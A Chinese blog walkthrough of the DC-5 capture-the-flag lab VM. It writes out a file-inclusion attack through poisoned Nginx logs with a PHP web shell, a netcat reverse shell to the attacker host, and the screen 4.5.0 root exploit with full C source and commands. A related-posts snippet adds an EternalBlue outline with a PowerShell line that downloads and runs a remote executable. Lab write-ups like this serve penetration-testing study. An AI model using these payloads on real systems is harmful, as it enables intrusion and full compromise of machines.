kali渗透之DC-5

已于 2022-12-06 09:45:12 修改
阅读量975 收藏 3
点赞数
分类专栏: DC靶机系列 网络渗透 linux 文章标签: 网络 安全
于 2022-12-05 23:34:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59711856/article/details/128191290
版权

准备kali(192.168.61.132)和DC-5(未知)

kali与DC-5都使用NAT连接

DC-5靶机 下载地址:

链接:https://pan.baidu.com/s/19Kv2fhBk3-yZYEP4MuDSaA?pwd=e8sq
提取码:e8sq

第一步使用nmap扫描同段主机,判断DC-5的IP地址

使用浏览器访问IP地址

 我们可以在Contact栏中发现留言板

我们注入一些信息,发现每次提交的时候下边的@20xx会变化

使用目录扫描dirsearch 命令,进行目录扫描

dirsearch -u http://192.168.61.137

或者使用kali自带的web爬行工具dirbuster扫描网站目录(与dirsearch两者功能一样)

 URL地址为DC-5的IP地址,Browse选择爆破字典

 字典是dirbuster的 路径为/usr/share/dirbuster/wordlist,可以看到有很多字典,我们选择其中的一个爆破,如下图:

然后点击右下角start 开始查询,可以看到扫描的文件

Response状态为 200的表示可以登录,403表示不可登录

 我们访问footer.php

 尝试一下访问file=/etc/passwd,查看是否存在文件包含漏洞,发现确实存在

 我们使用插件Wappalyzer查看Web servers是Nginx的

我们使用burp 进行抓包查看kali中Nginx的日志默认保存路径  /etc/nginx/nginx.conf,发现有两个保存文件即 access_log和error_log文件

 我们这file后边写入一句话木马

<?php system($_GET['yun']);?>

 然后我们查看Nginx的错误日志,并利用一句话木马

file=/var/log/nginx/error.log&yun=ls

 然后我们使用kali对4444端口进行监听

file=/var/log/nginx/error.log&yun=nc -e /bin/sh 192.168.61.132 4444 

nc -lvp 4444

 然后用pyhton进行交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

接着查看具有suid的权限命令,可以看到有一个 screen-4.5.0的版本

find / -perm /4000 2>/dev/null

 screen4.5.0

我们使用 searchsploit查看与screen 4.5.0相关的漏洞其漏洞

searchsploit screen 4.5.0

使用searchsploit命令下载41154.sh文件

searchsploit -m 41152.sh

 文件路径为  /usr/share/exploitdb/exploits/linux/local/41154.sh

查看 41154.sh 的文件

cat /usr/share/exploitdb/exploits/linux/local/41154.sh

 根据提示将以下代码复制到tmp路径下的rootshell.c和libhax.c

//以下代码放到libhax.c目录下
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

//以下代码放到rootshell.c目录下
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

然后使用 gcc 命令进行编译

gcc -o /tmp/rootshell /tmp/rootshell.c
//将rotshell编译到 rootshell中
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
//将libhax编译到 libhax.cn中

接着将刚刚编译的两个文件放入到靶机的tmp路径下

首先 使用kali 用4444端口连接靶机,将libhax.so文件传入到靶机

kali:nc -lvp 4444 < libhax.so
靶机: nc 192.168.61.132 4444 > libhax.so

 libhax文件上传成功,继续上传rootshell文件

kali:nc -lvp 4444 < rootshell
靶机: nc 192.168.61.132 4444 > rootshell

 上传成功,然后根据提示进行提权

cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
//提权成功

 ok 使用 whoami查看一下是root用户

进入root目录下查看,最终找到flag

DC-5靶机完结!撒花*★,°*:.☆( ̄▽ ̄)/$:*.°★* 。

余笙.'
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Kali网络渗透英文词汇-圣经版
11-01
Kali网络渗透英文词汇-圣经版
DC-5 靶机实战
PigLL的博客
08-22 668
DC-5 靶机实战 实验环境: 靶机DC-5 攻击机:kali 使kaliDC-5在同一网段,都在NAT模式下 1.信息收集: 首先确定kali的IP 扫描同网段存活的主机 因为kali的IP为192.168.137.136 所以确定DC-5靶机的IP为192.168.137.143 对DC-5进行端口扫描 ...
靶机渗透测试实战——DC-5
weixin_45116657的博客
10-30 6578
实验环境: 目标机DC-5的IP地址:未知(192.168.85.144) 攻击机kali的IP地址:192.168.85.139 实验步骤: 1、主机扫描,确定目标主机 命令:arp-scan -l 2、端口扫描,确定详细服务 命令1:nmap -sS -Pn -A -p- 192.168.85.144 命令2:nmap -sV -p- 192.168.85.144 #-sV —— 用来扫...
攻击机与靶机文件共享、演示流程以及第三方主机的访问
Ax的博客
04-17 5062
本文主要分享攻击机与靶机互 Ping 及它们之间的文件共享操作,文章结构: 首先会介绍主机与主机之间互 Ping 作为基础部分 其次,分享主干内容:主机与靶机之间文件共享及演示流程 最后,使用自己的 PC(第三方主机)作为攻击机来访问主机的虚拟机,参与共享过程
如何在kali linux中部署文件上传靶场,并在Windows本机访问
分享与记录
05-12 1073
这里我没有用之前那个比较经典的文件上传靶场,而是使用国光大佬自己开发的靶场,讲解更详细,界面更好看。 项目地址: https://hub.docker.com/r/sqlsec/ggctf-upload 进入目录,然后安装,这里我自行把文件夹名称改为upload-labs # 进入项目文件夹 cd upload-labs # 一键部署运行 docker-compose up -d 该项目的13个题目,端口为30001-30013。 因此,从 Windows 本机访问 kali linux 的 IP,
Kali系统渗透靶机(物理机)的详细过程
哆啦A梦
03-21 5936
Kali系统渗透靶机
DC-5靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-30 2565
dc-5靶场详细渗透过程
DC-5靶机进行渗透测试
zll___的博客
03-20 465
DC-5靶机进行渗透测试
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
kali-linux-2023.3-vmware-amd64.part1.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
kali-linux-2021.3-installer-amd64.part4.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用: kali-linux-2021.3-installer-amd64.part5.rar ... kali-linux-2021.3-installer-amd64....
Kali渗透DC:5
qq_50905066的博客
03-28 4194
与前面相同,我们从官网下载DC:5的镜像文件并打开,同时打开Kali使用Namp工具进行扫描 排除过大与过小和本机的地址就得到了靶机地址,对靶机进行端口扫描 发现靶机开启了http服务80端口,浏览器打开靶 搜集信息发展靶机web页面由ngiax服务器并使用wfuzz扫描到参数file,我们为file添加参数得到信息 看到日志信息,这是我们通过Burpsuite 抓包,上传木马至靶机日志文件 上传脚本之后使用中华蚁剑链接 链接成功,查看用户权限 登录用户...
靶场搭建(二)kali虚拟机准备
m0_55655822的博客
02-13 848
kali虚拟机安装以及基本配置教程
DC-5渗透实战】
qq_23347209的博客
10-02 1719
其实后续操作呢就是阅读这个.sh文件内容并且按流程操作就可以了简单说明:需要分别创建.c文件并且进行编译后传到目标靶机服务器上,最后执行.runme.sh文件就可以提权到root。Weevely是一款使用python编写的webshell工具,集webshell生成和连接于一身,采用c/s模式。在linux上使用时还是很好的,集服务器错误配置审计,后门放置,暴力破解,文件管理,资。源搜索,网络代理,命令执行,数据库操作,系统信息收集及端口扫描等功能。使用find命令查看可以利用的权限执行。
DC-5渗透测试教程详解
城下深蓝的博客
02-19 946
DC-5渗透测试教程详解
Kali linux windows木马(外网) 保姆级教学
m0_73135216的博客
01-01 3005
kali linux 木马实现外网控制(保姆级教学)
利用Kali 完成一次简单的渗透
热门推荐
qq_50905066的博客
03-20 3万+
这里我们需要两台虚拟机。一台Kali 作为攻击机,一台Ubuntu作为靶机。 如图: 渗透的话我们需要先得到靶机的ip 地址才能进行扫描。因为是虚拟机,只要我们知道了Kali 的ip 的地址,扫描其所在网段就可以获得靶机的地址了。 如图: 通过使用Kali自带的扫描工具执行Namp -sP 192.168.161.1/24就可以扫到了。这里我们排出太小的地址和太大的地址以及攻击的地址就可以确定靶机的地址了。 在得到靶机的地址之后,我们就可以进一步扫描靶机端口,从其中获得靶机开启的端口和..
Rust - TCP Server
最新发布
伊织看世界
05-09 418
内容来自:软件工艺师 - Rust Web 全栈开发教程【完结】修改文件 tcpserver – src –修改文件 tcpclient – src –伊织 2024-05-09(四)凌晨。删掉原来的内容,配置。
kali利用ms17-010挂马
12-15
根据提供的引用内容,我们无法回答与网站挂马和文本输入相关的问题。关于kali利用ms17-010挂马的问题,我们需要先了解一下ms17-010是什么。ms17-010是指微软在2017年3月份发布的一个安全补丁,用于修复Windows操作系统中的SMBv1漏洞。攻击者可以利用该漏洞远程执行代码,从而控制受感染的计算机。以下是kali利用ms17-010挂马的步骤: 1. 打开终端,输入以下命令更新kali系统: ```shell sudo apt-get update sudo apt-get upgrade ``` 2. 下载ms17-010漏洞利用工具,可以从GitHub上下载: ```shell git clone https://github.com/worawit/MS17-010.git ``` 3. 进入MS17-010目录,运行以下命令编译漏洞利用工具: ```shell cd MS17-010 make ``` 4. 执行以下命令,扫描目标主机是否存在SMBv1漏洞: ```shell ./send_and_execute 192.168.1.100 whoami.exe ``` 5. 如果目标主机存在SMBv1漏洞,执行以下命令,获取目标主机的Shell: ```shell ./eternalblue 192.168.1.100 shellcode.bin ``` 6. 执行以下命令,连接目标主机的Shell: ```shell nc 192.168.1.100 4444 ``` 7. 在目标主机的Shell中执行以下命令,下载并执行挂马程序: ```shell powershell -c "(new-object System.Net.WebClient).DownloadFile('http://www.trojan.com/1.exe','C:\Windows\Temp\1.exe');Start-Process 'C:\Windows\Temp\1.exe'" ``` 需要注意的是,上述步骤仅供学习和研究使用,请勿用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

余笙.'

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值